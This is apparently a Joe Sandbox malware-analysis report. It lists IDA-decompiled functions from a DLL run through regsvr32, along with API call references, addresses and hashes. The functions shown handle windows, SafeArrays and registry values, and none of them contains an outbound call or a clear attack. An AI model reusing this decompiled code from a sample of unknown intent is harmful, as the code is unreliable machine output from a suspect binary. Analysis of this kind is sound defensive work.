								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1001B2D2();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = L10012730();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1001b31a
0x1001b322
0x1001b324
0x1001b341
0x1001b34f
0x1001b35a
0x1001b35c
0x1001b35e
0x1001b360
0x1001b36b
0x1001b36d
0x1001b37a
0x1001b37a
0x1001b37c
0x1001b382
0x1001b386
0x1001b3a4
0x1001b397
0x1001b39a
0x1001b39c
0x1001b39c
0x1001b386
0x1001b3ad
0x00000000
0x00000000
0x00000000
0x1001b362
0x1001b362
0x1001b363
0x1001b365
0x1001b367
0x00000000
0x1001b362
0x1001b354
0x1001b356
0x1001b358
0x00000000
0x00000000
0x00000000
0x1001b358
0x1001b326
0x1001b32d
0x1001b33c
0x1001b33c
0x00000000
0x1001b33c
0x1001b32f
0x1001b336
0x00000000
0x00000000
0x1001b338
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1001B344
GetParent.USER32(?), ref: 1001B352
GetParent.USER32(?), ref: 1001B365
GetLastActivePopup.USER32(?), ref: 1001B374
IsWindowEnabled.USER32(?), ref: 1001B389
EnableWindow.USER32(?,00000000), ref: 1001B39C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
Instruction ID: 5eb2a14de721a093d1a5a6b33b515e1c7fa1d211e2aaf4fcf38d1d55c5650deb
Opcode Fuzzy Hash: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
Instruction Fuzzy Hash: B511A072601F3297E262DA6A8D8071B77D8EF46AD1F160154EC61DF250DB70DEA052D0

Uniqueness

Uniqueness Score: -1.00%

Function 10037D2E Relevance: 9.1, APIs: 6, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10037D2E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				long _t32;
				void* _t34;
				void* _t39;
				void* _t59;
				void* _t60;

				_push(0x18);
				E10047680(0x10090c67, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x1c)) = __ecx;
				_push(_t60 - 0x18);
				_push(_t60 - 0x20);
				_push( *((intOrPtr*)(_t60 + 0xc)));
				_push(0x3e8);
				L100717DA();
				_t28 = GlobalLock( *(_t60 - 0x18));
				L1000140B(_t60 - 0x14, E100184C0());
				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
				 *(_t60 - 4) = 1;
				L100011E5(_t60 - 0x14, _t28);
				_t32 = GlobalUnlock( *(_t60 - 0x18));
				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
				_push( *(_t60 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t60 + 0xc)));
				L100717D4();
				_t55 =  *((intOrPtr*)(_t60 - 0x1c));
				PostMessageA( *(_t60 + 8), 0x3e4,  *( *((intOrPtr*)(_t60 - 0x1c)) + 0x20), _t32);
				_t34 = E1001795E( *((intOrPtr*)(_t60 - 0x1c)));
				_t62 = _t34;
				if(_t34 != 0) {
					_t59 = L1001ACEF(_t60 - 0x14);
					_t39 = E1001E302(__ebx, _t55, _t59, _t62);
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 4))));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xa0))(_t59);
					E1000FED3(_t60 - 0x14, 0xffffffff);
				}
				L100013E3( *((intOrPtr*)(_t60 - 0x14)) + 0xfffffff0, _t53);
				return E10047725(0);
			}

0x10037d2e
0x10037d35
0x10037d3a
0x10037d40
0x10037d44
0x10037d45
0x10037d48
0x10037d4d
0x10037d55
0x10037d66
0x10037d6b
0x10037d73
0x10037d77
0x10037d7f
0x10037d85
0x10037d89
0x10037d91
0x10037d96
0x10037d97
0x10037d9c
0x10037d9f
0x10037da4
0x10037daf
0x10037db7
0x10037dbc
0x10037dbe
0x10037dc8
0x10037dca
0x10037dd2
0x10037dd7
0x10037de2
0x10037de2
0x10037ded
0x10037df9

APIs

__EH_prolog3_catch.LIBCMT ref: 10037D35
UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10037D4D
GlobalLock.KERNEL32 ref: 10037D55
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 10037D7F
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10037D9F
PostMessageA.USER32(?,000003E4,?,00000000), ref: 10037DAF

Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967

Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow_strlen
String ID:
API String ID: 1660452366-0
Opcode ID: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
Instruction ID: c983e17f3d8bc18d83424c477c4f136d14217cd03d05b8c9496dd5e1b9f8dfa4
Opcode Fuzzy Hash: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
Instruction Fuzzy Hash: 5E218C39900109AFDF05DBA0CD4AAEEBB79FF05351F148264F515AB2E1DB34AA44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100232E6 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E100232E6(void* __eax, void* __ebx, void* __edi, void* __esi, char _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				short _v28;
				signed short _v32;
				char* _t25;
				short* _t27;
				void* _t34;
				short* _t35;
				signed short _t36;
				char _t37;
				signed int _t38;
				void* _t39;
				short* _t41;

				_t39 = __edi;
				_t34 = __ebx;
				_t41 = _a4;
				if( *_t41 != 0x2011) {
					L7:
					__imp__#9(_t41);
					_v12 = _v12 & 0x00000000;
					_v16 = _a8;
					_t25 =  &_v16;
					 *_t41 = 0x2011;
					__imp__#15(0x11, 1, _t25);
					__eflags = _t25;
					 *((intOrPtr*)(_t41 + 8)) = _t25;
					if(__eflags != 0) {
						goto L6;
					} else {
						E1000A035(_t34, _t35, _t39, _t41, __eflags);
						asm("int3");
						__eflags = _v28 - 0xb;
						_t27 = _t35;
						_t36 = _v32;
						if(_v28 != 0xb) {
							 *_t27 = 2;
						} else {
							_t36 =  ~_t36;
							 *_t27 = 0xb;
							asm("sbb ecx, ecx");
						}
						 *(_t27 + 8) = _t36;
						return _t27;
					}
				} else {
					__imp__#17( *((intOrPtr*)(_t41 + 8)));
					if(__eax != 1) {
						goto L7;
					} else {
						__imp__#20( *((intOrPtr*)(_t41 + 8)), 1,  &_v8);
						E1002303B( &_v8);
						__imp__#19( *((intOrPtr*)(_t41 + 8)), 1,  &_a4);
						E1002303B( &_a4);
						_t38 = _v8;
						_t25 = _a4 - _t38;
						if(_t25 < 0) {
							_t25 = 0;
						}
						_t37 = _a8;
						if(_t25 != _t37) {
							_v16 = _t37;
							_v12 = _t38;
							__imp__#40( *((intOrPtr*)(_t41 + 8)),  &_v16);
							_t25 = E1002303B( &_v16);
						}
						L6:
						return _t25;
					}
				}
			}

0x100232e6
0x100232e6
0x100232ed
0x100232f5
0x10023360
0x10023361
0x1002336a
0x1002336e
0x10023371
0x10023379
0x1002337e
0x10023384
0x10023386
0x10023389
0x00000000
0x1002338b
0x1002338b
0x10023390
0x10023391
0x10023397
0x10023399
0x1002339e
0x100233ac
0x100233a0
0x100233a0
0x100233a3
0x100233a8
0x100233a8
0x100233b1
0x100233b5
0x100233b5
0x100232f7
0x100232fa
0x10023303
0x00000000
0x10023305
0x1002330e
0x10023315
0x10023323
0x1002332a
0x10023332
0x10023335
0x10023337
0x10023339
0x10023339
0x1002333b
0x10023340
0x10023349
0x1002334c
0x1002334f
0x10023356
0x10023356
0x1002335b
0x1002335d
0x1002335d
0x10023303

APIs

SafeArrayGetDim.OLEAUT32(?), ref: 100232FA
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 1002330E
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023323
SafeArrayRedim.OLEAUT32(?,?), ref: 1002334F
VariantClear.OLEAUT32(?), ref: 10023361
SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 1002337E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$Bound$ClearCreateRedimVariant
String ID:
API String ID: 3151960920-0
Opcode ID: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
Instruction ID: c9470c1b6fd187e16e6dce7b7d25325f3df280aac33c778134fea66dad733e72
Opcode Fuzzy Hash: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
Instruction Fuzzy Hash: 8E114979900219AFEB10EFA4CD85ADE7BB9EF04340F90C4A5F945D6160D770EB908B50

Uniqueness

Uniqueness Score: -1.00%

Function 10023DDD Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E10023DDD(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* __edi;
				void* __ebp;
				void* _t17;
				void* _t18;
				signed int _t20;
				void* _t29;
				void* _t36;

				_t16 =  &_v16;
				_t29 = __ecx;
				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
				_t17 = E1002303B(_t16);
				__imp__#17( *((intOrPtr*)(__ecx + 8)));
				if(_t17 != 1) {
					_t18 = E10034149(_a4, 0, 0xffffffff);
				} else {
					__imp__#20( *((intOrPtr*)(__ecx + 8)), 1,  &_v12, __esi, __ebx);
					_t20 =  &_v8;
					__imp__#19( *((intOrPtr*)(__ecx + 8)), 1, _t20);
					__imp__#18( *((intOrPtr*)(__ecx + 8)));
					_t24 = _t20 * (_v8 - _v12 + 1);
					_t34 = _a4;
					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
					_t18 = L1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
				}
				__imp__#24( *((intOrPtr*)(_t29 + 8)));
				return _t18;
			}

0x10023de4
0x10023de7
0x10023ded
0x10023df4
0x10023dfc
0x10023e05
0x10023e64
0x10023e07
0x10023e12
0x10023e18
0x10023e21
0x10023e31
0x10023e39
0x10023e3c
0x10023e44
0x10023e51
0x10023e5a
0x10023e6c
0x10023e74

APIs

SafeArrayAccessData.OLEAUT32(?,?), ref: 10023DED
SafeArrayGetDim.OLEAUT32(?), ref: 10023DFC
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10023E12
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023E21
SafeArrayGetElemsize.OLEAUT32(?), ref: 10023E31

Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B

SafeArrayUnaccessData.OLEAUT32(?), ref: 10023E6C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
String ID:
API String ID: 719575404-0
Opcode ID: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
Instruction ID: cd6b60c9eaf2634be566483e00a3dd84f594c3239c15aba867d25aa922b9696a
Opcode Fuzzy Hash: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
Instruction Fuzzy Hash: BA11CE7A500019BFEF019BA4CD85DDDBB7DFB05350F008251F925E21E0CB31AEA08B90

Uniqueness

Uniqueness Score: -1.00%

Function 10026082 Relevance: 9.1, APIs: 6, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026082(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E10025F4C(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E10025EBB(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}

0x1002608b
0x00000000
0x1002610c
0x10026091
0x100260ba
0x100260bc
0x100260d0
0x1002609e
0x00000000
0x1002609e
0x100260e8
0x100260ee
0x100260f1
0x00000000
0x100260fb
0x100260c0
0x00000000
0x00000000
0x100260c6
0x00000000
0x100260c6
0x10026098
0x1002609c
0x100260a6
0x00000000
0x100260a6
0x00000000

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 100260A6
RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 100260C6
RegCloseKey.ADVAPI32(00000000), ref: 100260F1

Part of subcall function 10025EBB: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F38
Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F42

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002610C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
Instruction ID: 88889b090a1c033fd2a8edf356c12eeefb5eb30433966703c4018381315e71d3
Opcode Fuzzy Hash: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
Instruction Fuzzy Hash: AD117032001629BBDF228F60EE84B9F3B66EF09791F518150FE1595061CB76DD61EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 10024316 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E10024316(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* __edi;
				void* __ebp;
				void* _t17;
				void* _t18;
				signed int _t20;
				void* _t29;
				void* _t36;

				_t16 =  &_v16;
				_t29 = __ecx;
				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
				_t17 = E1002303B(_t16);
				__imp__#17( *((intOrPtr*)(__ecx + 8)));
				if(_t17 != 1) {
					_t18 = E10034149(_a4, 0, 0xffffffff);
				} else {
					__imp__#20( *((intOrPtr*)(__ecx + 8)), 0,  &_v12, __esi, __ebx);
					_t20 =  &_v8;
					__imp__#19( *((intOrPtr*)(__ecx + 8)), 0, _t20);
					__imp__#18( *((intOrPtr*)(__ecx + 8)));
					_t24 = _t20 * (_v8 - _v12 + 1);
					_t34 = _a4;
					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
					_t18 = L1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
				}
				__imp__#24( *((intOrPtr*)(_t29 + 8)));
				return _t18;
			}

0x1002431d
0x10024320
0x10024326
0x1002432d
0x10024335
0x1002433e
0x1002439d
0x10024340
0x1002434b
0x10024351
0x1002435a
0x1002436a
0x10024372
0x10024375
0x1002437d
0x1002438a
0x10024393
0x100243a5
0x100243ad

APIs

SafeArrayAccessData.OLEAUT32(?,?), ref: 10024326
SafeArrayGetDim.OLEAUT32(?), ref: 10024335
SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 1002434B
SafeArrayGetUBound.OLEAUT32(?,00000000,?), ref: 1002435A
SafeArrayGetElemsize.OLEAUT32(?), ref: 1002436A

Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B

SafeArrayUnaccessData.OLEAUT32(?), ref: 100243A5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
String ID:
API String ID: 719575404-0
Opcode ID: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
Instruction ID: 88db7224a8a0f5af019c71018b507da94ff957cc0a1cbedb2de26f508a1d3972
Opcode Fuzzy Hash: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
Instruction Fuzzy Hash: 84118E7A500529BFEB019BA4CE85EDDBB7DFB05350F104250F925E62A0CB31BE618B90

Uniqueness

Uniqueness Score: -1.00%

Function 10021CE5 Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10021CE5(struct HWND__* _a4) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t3;
				struct HWND__* _t6;
				void* _t7;
				void* _t10;
				struct HWND__* _t12;
				struct HWND__* _t15;

				_t3 = GetFocus();
				_t15 = _t3;
				if(_t15 != 0) {
					_t12 = _a4;
					if(_t15 == _t12) {
						L10:
						return _t3;
					}
					_push(_t7);
					if(E10021BD1(_t7, _t10, _t12, _t15, 3) != 0) {
						L5:
						if(_t12 == 0 || (GetWindowLongA(_t12, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t15, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t12);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t15);
					_t15 = _t3;
					if(_t15 == _t12) {
						goto L9;
					}
					_t3 = E10021BD1(GetParent, _t10, _t12, _t15, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}

0x10021ce6
0x10021cec
0x10021cf0
0x10021cf3
0x10021cf9
0x10021d57
0x00000000
0x10021d57
0x10021cfb
0x10021d0c
0x10021d23
0x10021d25
0x10021d46
0x10021d50
0x00000000
0x10021d37
0x10021d38
0x10021d3c
0x10021d44
0x10021d56
0x00000000
0x10021d56
0x00000000
0x10021d44
0x10021d25
0x10021d0f
0x10021d11
0x10021d15
0x00000000
0x00000000
0x10021d1a
0x10021d21
0x00000000
0x00000000
0x00000000
0x10021d21
0x10021d59

APIs

GetFocus.USER32 ref: 10021CE6
GetParent.USER32(00000000), ref: 10021D0F

Part of subcall function 10021BD1: GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
Part of subcall function 10021BD1: GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05

GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
GetParent.USER32(?), ref: 10021D38
GetDesktopWindow.USER32 ref: 10021D3C
SendMessageA.USER32 ref: 10021D50

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
String ID:
API String ID: 3020784601-0
Opcode ID: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
Instruction ID: 99b8e3808f96a69b3d538ace9a8887a7a6fbfffd02d8e37485124c6c5aeb4666
Opcode Fuzzy Hash: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
Instruction Fuzzy Hash: C4F0A43E940521BAE36297296D85FEE62DADFA7AD0FD20314F916A61A0DB34DC4140E8

Uniqueness

Uniqueness Score: -1.00%

Function 10027494 Relevance: 9.0, APIs: 6, Instructions: 47
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10027494(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}

0x1002749b
0x100274d6
0x1002750c
0x1002750c
0x1002750e
0x00000000
0x1002750e
0x100274f9
0x100274fb
0x10027503
0x00000000
0x10027509
0x10027509
0x00000000
0x10027509
